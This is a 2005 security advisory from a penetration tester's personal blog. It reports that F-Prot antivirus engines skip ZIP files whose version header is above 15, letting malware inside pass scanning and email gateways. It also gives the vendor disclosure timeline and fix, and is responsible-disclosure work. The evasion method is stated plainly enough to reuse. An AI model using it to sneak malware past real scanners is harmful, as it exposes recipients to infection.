F-Prot/Frisk Anti Virus bypass - ZIP Version Header
Ref : TZO-012005-Fprot
I. Backround
http://www.f-prot.com/products/corporate_users/
FRISK Software International has, since it was first established in 1993, consistently maintained its position as one of the world's leading companies in anti virus research and product development.
FRISK Software produces the hugely popular F-Prot Anti virus
products range offering unrivalled neural network and heuristic detection capabilities.
In addition to this, the F-Prot AVES managed online e-mail security service
filters away the nuisance of spam e-mail as well as viruses, worms and other
malware that increasingly clog up inboxes and threaten data security.
n F-Prot Antivirus for Windows
n F-Prot Antivirus for Microsoft Exchange
n F-Prot Antivirus for Linux x86 / BSD x86
n F-Prot Antivirus for AIX
n F-Prot Antivirus for DOS
n F-Prot Antivirus for Solaris SPARC / Solaris
x86
n F-Prot Antivirus for AIX
II. Description
The F-prot engines failes to decompress ZIP files which have a version
header greater then 15. The consequence is that the F-prot Engine
is unable to scan the virus/malware inside and consequently flags
it as harmless. If used as an Email Gateway solution the offending
Emails will slip through.
Local ZIP file header:
local file header signature 4 bytes (0x04034b50)
version needed to extract 2 bytes
Winzip, Winrar, MS Zip engine decompress fine.
Tested offset :
In this example byte 4 has the version header value 15. F-prot fails to decompress the ZIP files with a version header greater then 15.
Trivial Solution:
The ZIP decompression engine should ignore the Version header of the
ZIP file and nonetheless decompress the file whatever the version
field indicates.
III. Summary
Vendor contact : 30/10/2005
Vendor Response : 01/11/2005
Vendor Response :
Thank you very much for notifying us of this bug
in the current version of
F-Prot Antivirus. A fix for this bug will be included in future versions
of F-Prot Antivirus.
IV. Download
Wait, what's this?
This
is my Personal "Blog", well kind of, my name is Thierry Zoller I
am currently working as a Security Engineer and Penetration Tester for "some
company" in Luxembourg.
On these pages i'll treat everything I enjoy and I get in touch with. This
may not be strictly related to security but may also touch parts of my personal
life.
Speaking of which, on the left that's me, I am 26 and have been involved in
the security field since I was 16. I do sports, Fitness and Body Building,
I hack various things such as cars, electronics...
Disclaimer
The views and opinion expressed herein are my personal views and are not intended to reflect the views of my employer or any other entity.